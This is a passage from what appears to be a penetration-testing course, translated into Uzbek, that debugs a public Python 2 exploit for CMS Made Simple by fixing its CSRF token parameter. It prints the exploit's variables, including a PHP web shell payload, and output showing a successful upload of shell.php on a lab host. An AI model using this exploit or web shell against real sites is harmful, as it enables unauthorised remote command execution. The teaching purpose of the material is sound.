13.2.3. Troubleshooting the "index out of range" Error

Oldingi bo‘limda aniqlaganimizdek, Python interpretatori o‘zgartirilgan exploit ning 24-qatoriga oid xatoni keltirib chiqardi.

Ushbu qatorni tekshirib ko‘rsak, u parse_csrf_token funksiyasiga uzatilgan location parametrida saqlangan string ni kesish uchun split metodidan foydalanayotganini ko‘ramiz. Python hujjatlari split metodi haqida shuni ko‘rsatadiki, bu metod birinchi argument sifatida uzatilgan ixtiyoriy ajratuvchi yordamida kirish string ini kesadi. split tomonidan qaytarilgan string bo‘laklari keyin Python list ob'ektida saqlanadi va unga indeks orqali kirish mumkin:

kali@kali:~$ python
...
>>> mystr = "Kali*-*Linux*-*Rocks"
>>> result = mystr.split("*-*")
>>> result
['Kali', 'Linux', 'Rocks']
>>> result[1]
'Linux'

Ro‘yxat 33 - Python string split metodi

Bizning exploit kodimizda string ajratuvchisi csrf_param o‘zgaruvchisi ("__c") va undan keyin tenglik belgisi sifatida belgilangan:

csrf_param = "__c"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"

def parse_csrf_token(location):
    return location.split(csrf_param + "=")[1]

Ro‘yxat 34 - 24-qator kodini tushunish

IndexError ni yaxshiroq tushunish uchun parse_csrf_token funksiyasida return buyrug‘idan oldin print bayonotini qo‘shishimiz mumkin:

csrf_param = "__c"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"

def parse_csrf_token(location):
    print "[+] String that is being split: " + location
    return location.split(csrf_param + "=")[1]

Ro‘yxat 35 - split metodi chaqiriladigan string ni ko‘rish uchun print bayonotini qo‘shish

Endi exploit split metodi chaqirilishidan oldin to‘liq string ni ko‘rsatadi:

kali@kali:~$ python2 44976_modified.py
/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py:849: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: <https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings>
  InsecureRequestWarning)
[+] Authenticated successfully with the supplied credentials
[+] String that is being split: <https://10.11.0.128/admin?_sk_=f2946ad9afceb247864>
Traceback (most recent call last):
  File "44976_modified.py", line 104, in <module>
    run()
  File "44976_modified.py", line 95, in run
    cookies,csrf_token = authenticate()
  File "44976_modified.py", line 39, in authenticate
    return response.cookies, parse_csrf_token(response.headers['Location'])
  File "44976_modified.py", line 25, in parse_csrf_token
    return location.split(csrf_param + "=")[1]
IndexError: list index out of range

Ro‘yxat 36 - print chiqishini tekshirish va csrf_param o‘zgaruvchisida belgilangan string ning yo‘qligini sezish

Exploit kodi kirish string ida csrf_param o‘zgaruvchisida belgilangan "__c" ni o‘z ichiga olishini kutgan bo‘lsa-da (Ro‘yxat 35 da ko‘rsatilganidek), biz web application dan "sk" ni oldik.

Hozirda bu nima uchun sodir bo‘layotganini to‘liq tushunmayapmiz. Ehtimol, exploit ishlab chiqaruvchisining dasturiy ta’minot versiyasi bilan biznikida nomuvofiqlik bor yoki CMS konfiguratsiyasida farq mavjud. Har qanday holatda ham, exploit ishlab chiqarish hech qachon silliq kechmasligini bilamiz.

Keyin, csrf_param o‘zgaruvchisini CMS javobiga moslashtirishga harakat qilib, exploit ishlaydimi yoki yo‘qligini aniqlaymiz:

csrf_param = "_sk_"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"

Ro‘yxat 37 - csrf_param o‘zgaruvchisini o‘zgartirish

Endi o‘zgartirilgan exploit ni ishga tushiramiz:

kali@kali:~$ python2 44976_modified.py
/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py:849: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: <https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings>
  InsecureRequestWarning)
[+] Authenticated successfully with the supplied credentials
[+] String that is being split: <https://192.168.50.45/admin?_sk_=bdc51a781fe6edcc126>
[*] Attempting to upload cmsmsrce.txt...
...
[+] Successfully uploaded cmsmsrce.txt
[*] Attempting to copy cmsmsrce.txt to shell.php...
...
[+] File copied successfully
[+] Exploit succeeded, shell can be found at: <https://192.168.50.45/uploads/shell.php>